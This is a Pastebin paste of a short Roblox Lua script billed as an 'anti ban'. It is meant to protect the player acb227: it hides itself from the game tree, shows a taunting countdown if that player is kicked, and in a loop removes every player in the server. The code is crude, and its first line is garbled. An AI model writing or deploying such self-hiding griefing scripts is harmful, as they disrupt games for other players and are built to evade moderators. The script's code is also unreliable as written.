JayGamerz

Untitled

Jul 8th, 2016
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.74 KB | None | 0 0
  1. script/c = Instance.new("Hint")
  2. script.Parent = nil
  3. c.Text = "Acb227's anti ban v1.0"
  4. c.Parent = game.Workspace
  5. local time = 20
  6. text = "Ur loss you had to kick acb227???? why???? ask ur self tht..." ..time.. "!!!"
  7. --lego
  8. function cmd(msg)
  9. if msg == "remove" then
  10. script:remove()
  11. end
  12. end
  13. game.Players.acb227.Chatted:connect(cmd)
  14. while true do
  15. wait(0.1)
  16. if not game.Players:FindFirstChild("acb227") then
  17. local m = Instance.new("Message") m.Parent = Workspace
  18. m.Text = text
  19. wait(0.1)
  20. m:Remove()
  21. for i = 1, 20 do
  22. text = "Ur loss you had to kick acb227???? why???? ask ur self tht..." ..time.. "!!!"
  23. wait(1)
  24. time = time - 1
  25. end
  26. end
  27. for i,v in pairs(game.Players:GetChildren()) do
  28. v:Remove()
  29. end
  30. end
Add Comment
Please, Sign In to add comment